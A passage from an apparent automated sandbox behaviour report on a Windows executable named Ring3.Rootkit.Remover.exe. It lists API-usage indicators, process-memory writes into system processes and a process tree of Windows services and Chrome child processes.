Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe

Suspicious use of FindShellTrayWindow 42 IoCs

pid	Process
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
5792	powershell.exe
5792	powershell.exe
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE

Suspicious use of SendNotifyMessage 34 IoCs

pid	Process
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
3316	Explorer.EXE
3316	Explorer.EXE
3316	Explorer.EXE
2960	OpenWith.exe
4468	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2140 wrote to memory of 612	2140	Ring3.Rootkit.Remover.exe	5
PID 2140 wrote to memory of 612	2140	Ring3.Rootkit.Remover.exe	5
PID 2140 wrote to memory of 612	2140	Ring3.Rootkit.Remover.exe	5
PID 2140 wrote to memory of 696	2140	Ring3.Rootkit.Remover.exe	7
PID 2140 wrote to memory of 696	2140	Ring3.Rootkit.Remover.exe	7
PID 2140 wrote to memory of 696	2140	Ring3.Rootkit.Remover.exe	7
PID 2140 wrote to memory of 808	2140	Ring3.Rootkit.Remover.exe	8
PID 2140 wrote to memory of 808	2140	Ring3.Rootkit.Remover.exe	8
PID 2140 wrote to memory of 808	2140	Ring3.Rootkit.Remover.exe	8
PID 2140 wrote to memory of 820	2140	Ring3.Rootkit.Remover.exe	9
PID 2140 wrote to memory of 828	2140	Ring3.Rootkit.Remover.exe	10
PID 2140 wrote to memory of 932	2140	Ring3.Rootkit.Remover.exe	11
PID 2140 wrote to memory of 932	2140	Ring3.Rootkit.Remover.exe	11
PID 2140 wrote to memory of 932	2140	Ring3.Rootkit.Remover.exe	11
PID 2140 wrote to memory of 988	2140	Ring3.Rootkit.Remover.exe	12
PID 2140 wrote to memory of 988	2140	Ring3.Rootkit.Remover.exe	12
PID 2140 wrote to memory of 988	2140	Ring3.Rootkit.Remover.exe	12
PID 2140 wrote to memory of 432	2140	Ring3.Rootkit.Remover.exe	13
PID 2140 wrote to memory of 432	2140	Ring3.Rootkit.Remover.exe	13
PID 2140 wrote to memory of 432	2140	Ring3.Rootkit.Remover.exe	13
PID 2140 wrote to memory of 720	2140	Ring3.Rootkit.Remover.exe	14
PID 2140 wrote to memory of 720	2140	Ring3.Rootkit.Remover.exe	14
PID 2140 wrote to memory of 708	2140	Ring3.Rootkit.Remover.exe	15
PID 2140 wrote to memory of 708	2140	Ring3.Rootkit.Remover.exe	15
PID 2140 wrote to memory of 1064	2140	Ring3.Rootkit.Remover.exe	16
PID 2140 wrote to memory of 1064	2140	Ring3.Rootkit.Remover.exe	16
PID 2140 wrote to memory of 1144	2140	Ring3.Rootkit.Remover.exe	17
PID 2140 wrote to memory of 1144	2140	Ring3.Rootkit.Remover.exe	17
PID 2140 wrote to memory of 1144	2140	Ring3.Rootkit.Remover.exe	17
PID 2140 wrote to memory of 1156	2140	Ring3.Rootkit.Remover.exe	18
PID 2140 wrote to memory of 1156	2140	Ring3.Rootkit.Remover.exe	18
PID 2140 wrote to memory of 1164	2140	Ring3.Rootkit.Remover.exe	19
PID 2140 wrote to memory of 1164	2140	Ring3.Rootkit.Remover.exe	19
PID 2140 wrote to memory of 1188	2140	Ring3.Rootkit.Remover.exe	20
PID 2140 wrote to memory of 1188	2140	Ring3.Rootkit.Remover.exe	20
PID 2140 wrote to memory of 1272	2140	Ring3.Rootkit.Remover.exe	21
PID 2140 wrote to memory of 1272	2140	Ring3.Rootkit.Remover.exe	21
PID 2140 wrote to memory of 1324	2140	Ring3.Rootkit.Remover.exe	22
PID 2140 wrote to memory of 1324	2140	Ring3.Rootkit.Remover.exe	22
PID 2140 wrote to memory of 1344	2140	Ring3.Rootkit.Remover.exe	23
PID 2140 wrote to memory of 1344	2140	Ring3.Rootkit.Remover.exe	23
PID 2140 wrote to memory of 1428	2140	Ring3.Rootkit.Remover.exe	24
PID 2140 wrote to memory of 1428	2140	Ring3.Rootkit.Remover.exe	24
PID 2140 wrote to memory of 1428	2140	Ring3.Rootkit.Remover.exe	24
PID 2140 wrote to memory of 1608	2140	Ring3.Rootkit.Remover.exe	25
PID 2140 wrote to memory of 1608	2140	Ring3.Rootkit.Remover.exe	25
PID 2140 wrote to memory of 1640	2140	Ring3.Rootkit.Remover.exe	26
PID 2140 wrote to memory of 1640	2140	Ring3.Rootkit.Remover.exe	26
PID 2140 wrote to memory of 1640	2140	Ring3.Rootkit.Remover.exe	26
PID 2140 wrote to memory of 1652	2140	Ring3.Rootkit.Remover.exe	27
PID 2140 wrote to memory of 1652	2140	Ring3.Rootkit.Remover.exe	27
PID 2140 wrote to memory of 1688	2140	Ring3.Rootkit.Remover.exe	28
PID 2140 wrote to memory of 1688	2140	Ring3.Rootkit.Remover.exe	28
PID 2140 wrote to memory of 1736	2140	Ring3.Rootkit.Remover.exe	29
PID 2140 wrote to memory of 1736	2140	Ring3.Rootkit.Remover.exe	29
PID 2140 wrote to memory of 1736	2140	Ring3.Rootkit.Remover.exe	29
PID 2140 wrote to memory of 1784	2140	Ring3.Rootkit.Remover.exe	30
PID 2140 wrote to memory of 1784	2140	Ring3.Rootkit.Remover.exe	30
PID 2140 wrote to memory of 1784	2140	Ring3.Rootkit.Remover.exe	30
PID 2140 wrote to memory of 1856	2140	Ring3.Rootkit.Remover.exe	31
PID 2140 wrote to memory of 1856	2140	Ring3.Rootkit.Remover.exe	31
PID 2140 wrote to memory of 1880	2140	Ring3.Rootkit.Remover.exe	32
PID 2140 wrote to memory of 1880	2140	Ring3.Rootkit.Remover.exe	32
PID 2140 wrote to memory of 1880	2140	Ring3.Rootkit.Remover.exe	32

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\fontdrvhost.exe
  "fontdrvhost.exe"
  2⤵
  PID:828
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:432

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Modifies registry class
PID:808
- C:\Windows\system32\wbem\unsecapp.exe
  C:\Windows\system32\wbem\unsecapp.exe -Embedding
  2⤵
  PID:2604
- C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
  "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
  2⤵
  PID:3772
- C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  2⤵
  PID:3796
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:3864
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:3928
- C:\Windows\system32\SppExtComObj.exe
  C:\Windows\system32\SppExtComObj.exe -Embedding
  2⤵
  PID:1916
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca
  2⤵
  PID:340
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:232
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:4220
- C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  2⤵
  PID:6676
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  2⤵
  PID:1040
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
  2⤵
  PID:800
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
  2⤵
  PID:1300
- C:\Windows\ImmersiveControlPanel\SystemSettings.exe
  "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
  2⤵
  PID:6164
- C:\Windows\system32\ApplicationFrameHost.exe
  C:\Windows\system32\ApplicationFrameHost.exe -Embedding
  2⤵
  PID:6252
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:6056
- C:\Windows\System32\oobe\UserOOBEBroker.exe
  C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
  2⤵
  - Drops file in Windows directory
  PID:4432
- C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
  C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
  2⤵
  PID:5836
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:3740
- C:\Windows\system32\OpenWith.exe
  C:\Windows\system32\OpenWith.exe -Embedding
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:2960
- C:\Windows\system32\OpenWith.exe
  C:\Windows\system32\OpenWith.exe -Embedding
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:4468
- C:\Windows\system32\wbem\wmiprvse.exe
  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  2⤵
  PID:5872
- C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
  2⤵
  PID:11440
- C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
  2⤵
  PID:544

C:\Windows\system32\fontdrvhost.exe
"fontdrvhost.exe"
1⤵
PID:820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1144

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1272

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1428
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2256

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1640

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1856

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1880
- C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004D4
  2⤵
  PID:4792

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1988

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
- Modifies data under HKEY_USERS
PID:2176

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2404

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
- Modifies data under HKEY_USERS
- Modifies registry class
PID:2452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2532

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2544

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2584

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2732

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3316
- C:\Users\Admin\AppData\Local\Temp\Ring3.Rootkit.Remover.exe
  "C:\Users\Admin\AppData\Local\Temp\Ring3.Rootkit.Remover.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2140
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:3408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c pause
    3⤵
    PID:2096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2104
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff95e20cc40,0x7ff95e20cc4c,0x7ff95e20cc58
    3⤵
    PID:5064
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1756,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1752 /prefetch:2
    3⤵
    PID:4648
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2036,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2100 /prefetch:3
    3⤵
    PID:2936
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2196,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2212 /prefetch:8
    3⤵
    PID:1840
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3160 /prefetch:1
    3⤵
    PID:4480
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3316 /prefetch:1
    3⤵
    PID:3724
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3092,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3576 /prefetch:1
    3⤵
    PID:1960
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4556,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3572 /prefetch:8
    3⤵
    PID:4204
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4704 /prefetch:8
    3⤵
    PID:2888
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4300,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4852 /prefetch:8
    3⤵
    PID:2692
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4676,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4648 /prefetch:8
    3⤵
    PID:1596
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4668,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5000 /prefetch:1
    3⤵
    PID:3308
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4540,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5008 /prefetch:1
    3⤵
    PID:868
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5168,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4680 /prefetch:8
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:5012
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4456,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5164 /prefetch:1
    3⤵
    PID:3076
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3508,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3460 /prefetch:1
    3⤵
    PID:2440
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3236,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4620 /prefetch:1
    3⤵
    PID:4308
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4360,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5308 /prefetch:8
    3⤵
    PID:4880
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3788,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5332 /prefetch:8
    3⤵
    PID:2100
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=3764,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5444 /prefetch:1
    3⤵
    PID:1220
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5200,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5180 /prefetch:1
    3⤵
    PID:1472
- - C:\Program Files\Google\Chrome\Application\chrome.exe
